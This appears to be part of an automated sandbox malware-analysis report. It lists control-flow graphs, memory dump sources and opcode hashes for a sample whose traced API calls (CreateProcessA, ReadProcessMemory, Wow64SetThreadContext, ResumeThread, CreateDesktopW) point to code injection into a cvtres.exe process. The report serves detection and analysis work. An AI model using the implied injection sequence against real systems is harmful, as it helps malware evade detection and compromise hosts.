                                        • Opcode ID: 569467014355d8aca6f01fb49557815f3067ec1e8d04eaac7816ba17de4eb1b6
                                        • Instruction ID: 55e00d2bf25aa451f624862f05a39c515203879315a01b3b9fcbe50cd33c2d6c
                                        • Opcode Fuzzy Hash: 569467014355d8aca6f01fb49557815f3067ec1e8d04eaac7816ba17de4eb1b6
                                        • Instruction Fuzzy Hash: 1741F771D1CB484FDB289F98A8066FD7BE0FB95310F04426FE499D3292DE74A845C782

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 147 7ffe7e1b2fa5-7ffe7e1b302f 151 7ffe7e1b3039-7ffe7e1b30a9 CreateDesktopW 147->151 152 7ffe7e1b3031-7ffe7e1b3036 147->152 153 7ffe7e1b30ab 151->153 154 7ffe7e1b30b1-7ffe7e1b30de 151->154 152->151 153->154
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID: CreateDesktop
                                        • String ID:
                                        • API String ID: 3054513912-0
                                        • Opcode ID: 734d2036624657542e32781348c46b7c18c567fecb27c06b642e8ca5e3320fe8
                                        • Instruction ID: ad8c07e5738b075ceb9a716af66ba9ed0858ac867abc35765841f75e20bf33b0
                                        • Opcode Fuzzy Hash: 734d2036624657542e32781348c46b7c18c567fecb27c06b642e8ca5e3320fe8
                                        • Instruction Fuzzy Hash: 6141AE7190CB5C8FDB59DF68C8496A9BBF0FB69310F00426FE08DD3252DA74A845CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 156 7ffe7e1b2681-7ffe7e1b268d 157 7ffe7e1b2698-7ffe7e1b2779 ReadProcessMemory 156->157 158 7ffe7e1b268f-7ffe7e1b2697 156->158 163 7ffe7e1b277b 157->163 164 7ffe7e1b2781-7ffe7e1b27b2 157->164 158->157 163->164
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 14209355552353dd84ce487831e64d382cd3538bf4b838e4bb817a06437c959b
                                        • Instruction ID: 9f1bee15a3837095f17a2d583ee119cc3b4b29273d2a31cc93cea45262bca3a8
                                        • Opcode Fuzzy Hash: 14209355552353dd84ce487831e64d382cd3538bf4b838e4bb817a06437c959b
                                        • Instruction Fuzzy Hash: 0741073191CB488FDB18DF9898466FD7BE0EF99311F0442AFE489C3292DE746845CB82

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 166 7ffe7e1b076a-7ffe7e1b302f 170 7ffe7e1b3039-7ffe7e1b30a9 CreateDesktopW 166->170 171 7ffe7e1b3031-7ffe7e1b3036 166->171 172 7ffe7e1b30ab 170->172 173 7ffe7e1b30b1-7ffe7e1b30de 170->173 171->170 172->173
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID: CreateDesktop
                                        • String ID:
                                        • API String ID: 3054513912-0
                                        • Opcode ID: e2be95d6440643b076a5072a141bb8031dea5f3c63d99b29528f10ba7c7da998
                                        • Instruction ID: 9eb1a3d4af7f5e0b6b43e8331c8bf871f05d26dc57da6d918f4b964e813501d9
                                        • Opcode Fuzzy Hash: e2be95d6440643b076a5072a141bb8031dea5f3c63d99b29528f10ba7c7da998
                                        • Instruction Fuzzy Hash: 2541AE7190CB1C8FDB58EF58D8497AAB7E0FB69311F10426FE08EE3251DB70A8458B81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 175 7ffe7e1b1f28-7ffe7e1b1f2f 176 7ffe7e1b1f3a-7ffe7e1b1f49 175->176 177 7ffe7e1b1f31-7ffe7e1b1f39 175->177 178 7ffe7e1b1f4b 176->178 177->176 178->178 179 7ffe7e1b1f4d-7ffe7e1b1fad 178->179 183 7ffe7e1b1fb7-7ffe7e1b1ff2 Wow64SetThreadContext 179->183 184 7ffe7e1b1faf-7ffe7e1b1fb4 179->184 186 7ffe7e1b1ffa-7ffe7e1b2029 183->186 187 7ffe7e1b1ff4 183->187 184->183 187->186
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 0b9d15c590157e34e3a6b34a0935afc8bae3b55199df4e0beea3da3432b01b4e
                                        • Instruction ID: 126d425e2e1adf86addf65deaa3af8500bf29316390af23d0762219811fc8ba5
                                        • Opcode Fuzzy Hash: 0b9d15c590157e34e3a6b34a0935afc8bae3b55199df4e0beea3da3432b01b4e
                                        • Instruction Fuzzy Hash: DD312532D0CB484FDB29ABA898466FA7BE1EF55321F05023FD059C3692DF74A809C791

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 189 7ffe7e1b1e2d-7ffe7e1b1e39 190 7ffe7e1b1e3b-7ffe7e1b1e43 189->190 191 7ffe7e1b1e44-7ffe7e1b1e69 189->191 190->191 192 7ffe7e1b1e6b 191->192 192->192 193 7ffe7e1b1e6d-7ffe7e1b1ef4 ResumeThread 192->193 198 7ffe7e1b1ef6 193->198 199 7ffe7e1b1efc-7ffe7e1b1f21 193->199 198->199
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: cbc1504661cc5764579055bfb2143388a2ebd926300022efe356f56acf0fa12a
                                        • Instruction ID: fd454f7fc377a7de65abdf3a82b92953fed8787abdd6e1250f67312f3507328b
                                        • Opcode Fuzzy Hash: cbc1504661cc5764579055bfb2143388a2ebd926300022efe356f56acf0fa12a
                                        • Instruction Fuzzy Hash: 1D31283190C7884FDB1BDB6888567E97FE1EF57320F0842AFD089C71A3DA685806C752

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 201 7ffe7e1b2b8b-7ffe7e1b2c4d CreateProcessA 204 7ffe7e1b2c4f 201->204 205 7ffe7e1b2c55-7ffe7e1b2c79 201->205 204->205
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1424911377.00007FFE7E1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe7e1b0000_IWsK3V2Ul9.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 19544cb4190071a3f959e35c42c8f46cff290b9b69c47c9c73ccb739d985bd01
                                        • Instruction ID: 5c3e34e7672454137321f4bb0c2e31737f940f3079b417e539558d22d42bfcd3
                                        • Opcode Fuzzy Hash: 19544cb4190071a3f959e35c42c8f46cff290b9b69c47c9c73ccb739d985bd01
                                        • Instruction Fuzzy Hash: 21314A34508B8C8FDB65DF18C8957E97BE0FF69350F04466ED88D8B292DB34A945CB82
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dbe4d849a68a5fd8f58d93e42b41df0cb0a755d6cd95fdb70f55bd21797f05b1
                                        • Instruction ID: a451da0e0844447428a1c90589309cb9cd2e5e7ce4bbafa520cf5cbb529d3549
                                        • Opcode Fuzzy Hash: dbe4d849a68a5fd8f58d93e42b41df0cb0a755d6cd95fdb70f55bd21797f05b1
                                        • Instruction Fuzzy Hash: A853D431D10B1A8ACB11EF68C890599F7B1FF99300F15D79AE4597B221EB70AAD4CF81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874775214.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_13b0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vl
                                        • API String ID: 0-682378881
                                        • Opcode ID: c4e0771f6a335e6428421d38bb63fecae0882af8078bb856e8b2eb503d022ea0
                                        • Instruction ID: 8b4b5f99b6963ff05ebc6796f0dd1a0d4830caff677ccb64a9f039d271ac5c62
                                        • Opcode Fuzzy Hash: c4e0771f6a335e6428421d38bb63fecae0882af8078bb856e8b2eb503d022ea0
                                        • Instruction Fuzzy Hash: 6CB13B70E00209CFDB14CFADDC857DEBBF6AF88318F149129D519A7654EB749845CB81
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7fe26631e3632466058ff3cd9255f017bc3d6b4e344f73b471319c55a1d1b03
                                        • Instruction ID: 5ba593b24fc53102a0aa3e88300e5ec0aaa1b10d029271a395ab369ebb0958ad
                                        • Opcode Fuzzy Hash: e7fe26631e3632466058ff3cd9255f017bc3d6b4e344f73b471319c55a1d1b03
                                        • Instruction Fuzzy Hash: A262FA31D10B5A8ECB11EB78C8546A9F7B1FF9A300F11C79AE45967125FB70AAC4CB81
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874775214.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_13b0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 207ddbb1a8c3ec8fa8a9d0fd73d30f96b081b9ece7207e32e61965d8c6573c7b
                                        • Instruction ID: b0e3ed0add0c0a306796c7ff5e366c790b0813411ea7642d2df108d70395857d
                                        • Opcode Fuzzy Hash: 207ddbb1a8c3ec8fa8a9d0fd73d30f96b081b9ece7207e32e61965d8c6573c7b
                                        • Instruction Fuzzy Hash: 9B12A3B05027458ED361EF65ED4C1C93BB2FB86398F904799C2612B2E9EBBC154ACF44
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874775214.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_13b0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08a1b4bce76b55c0739ab84ee335ccc6605a7fce716dbfb0bcef5c4143a93233
                                        • Instruction ID: f9ce0c919c7e008ce774fbde00150713c892946f05aa3a9509770e5b14a8ce31
                                        • Opcode Fuzzy Hash: 08a1b4bce76b55c0739ab84ee335ccc6605a7fce716dbfb0bcef5c4143a93233
                                        • Instruction Fuzzy Hash: BCB18C70E002098FDF14CFA8CC917EDBBF6AF88318F149529D915E7698EB349885CB81
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874775214.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_13b0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f41943edbb684d97d51e316130c77e75ccc66cd4342dc0b8cabc7df0bf07d7c
                                        • Instruction ID: 51460ba198a6eb739e0a65545c8352e1c9ff57c23c5daf6b7bad54a3e569c5a7
                                        • Opcode Fuzzy Hash: 8f41943edbb684d97d51e316130c77e75ccc66cd4342dc0b8cabc7df0bf07d7c
                                        • Instruction Fuzzy Hash: EFC1F4B09027458FD721EF68ED481C97BB2FB86364F504799D2612B2E9EBBC144ACF44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&eq$(iq
                                        • API String ID: 0-45519133
                                        • Opcode ID: bfe1efa7c9711a60705d6b5fb3c71860e3e0d9f5a249fec6214ca7da62bfdb9d
                                        • Instruction ID: 09393e0dd9c80d52e1c5d693710b74c81e4a1b7a807da61c2850639b0fd67411
                                        • Opcode Fuzzy Hash: bfe1efa7c9711a60705d6b5fb3c71860e3e0d9f5a249fec6214ca7da62bfdb9d
                                        • Instruction Fuzzy Hash: EA514D71F102199BDB55EBB9C4506AEBAF2AFD8700F148529D406BB384DF30AD46CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Teeq
                                        • API String ID: 0-348098666
                                        • Opcode ID: 3ef56efa25abab60912d3ac34c86423b0cda75c413b5a608ca01ecf85805ccf2
                                        • Instruction ID: 5b19bfc8acce3bae6d025dbfca853fffbc561a1a652d76307897ff7271eab34d
                                        • Opcode Fuzzy Hash: 3ef56efa25abab60912d3ac34c86423b0cda75c413b5a608ca01ecf85805ccf2
                                        • Instruction Fuzzy Hash: 92717E71A003198FDB14DFA9C894A5EFBF6FF88304F558568D806AB3A5DB71AC44CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Teeq
                                        • API String ID: 0-348098666
                                        • Opcode ID: 6dac4c4c33e39bcdce7860077a2d49b98c79905ae00830589006574de8b82454
                                        • Instruction ID: b67f6a8b1dcff61bb27d36bbe5e3b94a10107bde104a6797f92410ca07d85d9d
                                        • Opcode Fuzzy Hash: 6dac4c4c33e39bcdce7860077a2d49b98c79905ae00830589006574de8b82454
                                        • Instruction Fuzzy Hash: 9D617F75E013098FDB54CFA9C894A9AFBF6BF88300F158169D405AB3A5DB71AD44CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Teeq
                                        • API String ID: 0-348098666
                                        • Opcode ID: 7c98d27a1ae42ff557984b16a689c7f367013e0eed8adce8789de05bd58e5b1f
                                        • Instruction ID: ff62993bd207887370117838096417964058c865695a42d82c8f529ee22bc6c6
                                        • Opcode Fuzzy Hash: 7c98d27a1ae42ff557984b16a689c7f367013e0eed8adce8789de05bd58e5b1f
                                        • Instruction Fuzzy Hash: 8041AE70B102149FDB54DB69D894B6DBBF6BF88710F5440A9E905EB3A5CF72AD40CB80
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af7e904ca367a8bc42c3d051251573849c8d3a9ce921e644b56911ea2c08c23b
                                        • Instruction ID: 7a4593b82b96defdb85e2c7fdf0408983599546f731d7a26ec68104accf53e4c
                                        • Opcode Fuzzy Hash: af7e904ca367a8bc42c3d051251573849c8d3a9ce921e644b56911ea2c08c23b
                                        • Instruction Fuzzy Hash: E401FC362093956FCB03DF686C145AD7FB6EF86210B05849BD544CB1A3DA314819C7A6
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c532b78ddc435da70bb0590084a3e10bccc146451d7d65ec1173035ce82e0aa
                                        • Instruction ID: 63ec9c28965c42c2504c3ea25483f93fd153e07f42f3d97fa7fbcfa001fb3521
                                        • Opcode Fuzzy Hash: 7c532b78ddc435da70bb0590084a3e10bccc146451d7d65ec1173035ce82e0aa
                                        • Instruction Fuzzy Hash: 4141E374B207199BCB06EB68D85475EBBB7FF89300F208116E814A7399DF759C818B90
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 433d38cbc2ae1f1f734d62f55634a4ad4e8f3f295962cbccd15664347cec7dd4
                                        • Instruction ID: 588f8b148e5ee2200b208dec6f4f073906aa8e84ab1c780b3de61a0ea234e482
                                        • Opcode Fuzzy Hash: 433d38cbc2ae1f1f734d62f55634a4ad4e8f3f295962cbccd15664347cec7dd4
                                        • Instruction Fuzzy Hash: 5B413171E013199BDB14DFA5C890BDEFBF5EF88700F288129E405BB254EB71A946CB90
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d969a8ab7ea0fbee34da84a44ff14e78a62f90effccd1192faa2ccb6dbf96c57
                                        • Instruction ID: b495a189d77c4abf7b91470aa8838c25c024248b44c92fef1462a1c9a14b046f
                                        • Opcode Fuzzy Hash: d969a8ab7ea0fbee34da84a44ff14e78a62f90effccd1192faa2ccb6dbf96c57
                                        • Instruction Fuzzy Hash: 2B418270A01205CBDB44EF69D884799BBF6FF88300F14C565D908AF39AEBB5E941CB90
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874582061.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_135d000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10291247ec36154af0c3129a68afcee370fad1501c1cb3c64ff9302b0704fe14
                                        • Instruction ID: 39784d5cc8f281745cc7e72bb8ebbebc6e2c56586e3dc21bfa528660e76cf95e
                                        • Opcode Fuzzy Hash: 10291247ec36154af0c3129a68afcee370fad1501c1cb3c64ff9302b0704fe14
                                        • Instruction Fuzzy Hash: 24214371104204DFDB51DF58D9C0F26BB69FB84B68F20C569EC090B342C33AD407CAA2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874582061.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_135d000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff9a298dad4c8f16bfd3b7853e7ee2c60eca233dcac5ca519d879240e1992101
                                        • Instruction ID: d9d8ad07f3742e0fe2e08e28bb22dd088e99463a46f0619b5a34cbca0e046099
                                        • Opcode Fuzzy Hash: ff9a298dad4c8f16bfd3b7853e7ee2c60eca233dcac5ca519d879240e1992101
                                        • Instruction Fuzzy Hash: 9C21F2B5504204DFDB45DF98D980F26BB65FB88B28F24C96DDC094B246C73AD846CA61
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874582061.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_135d000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f168da165589dfdef4a43e57e8d8c013432e9dfc6428f86b001ad7f8ffcfbf38
                                        • Instruction ID: 4a399b3cc091fb15ddd2cb7f57047a7220186b2f73b04b38160ca01706fc631c
                                        • Opcode Fuzzy Hash: f168da165589dfdef4a43e57e8d8c013432e9dfc6428f86b001ad7f8ffcfbf38
                                        • Instruction Fuzzy Hash: F121D2765093808FDB13CF24D994B15BF71FB86314F28C5EAD8488B693C33A940ACB62
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08509a3b5207146dd4bda29a8c35c95209e2ab1c7f3e658b530a0d277a159d3b
                                        • Instruction ID: 6d37832a12047a7165291a74bb4fb141dffdaa750dccb34bd51bc7217ea5ad30
                                        • Opcode Fuzzy Hash: 08509a3b5207146dd4bda29a8c35c95209e2ab1c7f3e658b530a0d277a159d3b
                                        • Instruction Fuzzy Hash: 861103768002499FDB10CF99D945BDEBBF4EB48320F14841AE918A7210C335A954DFA5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874582061.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_135d000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                        • Instruction ID: 5996d0f7b6620ebe7f90b78a57129a3a4c9313fe0a1b58c80249fd90d71c6c73
                                        • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                        • Instruction Fuzzy Hash: 4711BB75504280DFDB02CF54D5C4B15BBB1FB84728F24C6ADDC094B256C33AD84ACBA1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 603d125cde0017e5e8a45791934bbcd44ff21f7d4f0768b797a678629a2573e0
                                        • Instruction ID: 530709c2d7c21cb6474de594c5e280293f072e11d29900da45da5de9ce1cd974
                                        • Opcode Fuzzy Hash: 603d125cde0017e5e8a45791934bbcd44ff21f7d4f0768b797a678629a2573e0
                                        • Instruction Fuzzy Hash: 531104B6800249DFDB10CF99D945BDEBFF4EF48320F14841AE918A7250C339A554DFA5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3875655078.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_30d0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 29e2124a597aa76dcf5d91eb731935ac167b280f7040c899f8583c10be8be49e
                                        • Instruction ID: 30619daa548958b3ea0f7202b9ab31f3a2905a6fb47d6ecc3adcfa6c52df4a91
                                        • Opcode Fuzzy Hash: 29e2124a597aa76dcf5d91eb731935ac167b280f7040c899f8583c10be8be49e
                                        • Instruction Fuzzy Hash: B9E01776741204CFC718EBA8F4944A8B732FF8479D360897AC9094B340DB369C15DF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3874775214.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_13b0000_cvtres.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vl
                                        • API String ID: 0-682378881
                                        • Opcode ID: 7e52d11eddd3947e4bbe3a8fbc4b37bbd4794bed5a6689cf478d2cbbfe5cbe33
                                        • Instruction ID: 144b9990c01518f5b1d59560f88c6b7dbea9bcec3be42eb7f8dcf0c7096f07be
                                        • Opcode Fuzzy Hash: 7e52d11eddd3947e4bbe3a8fbc4b37bbd4794bed5a6689cf478d2cbbfe5cbe33
                                        • Instruction Fuzzy Hash: 52917C70E002099FDF14CFACD9C17DEBBF6AF88318F148529E505AB6A4EB749845CB81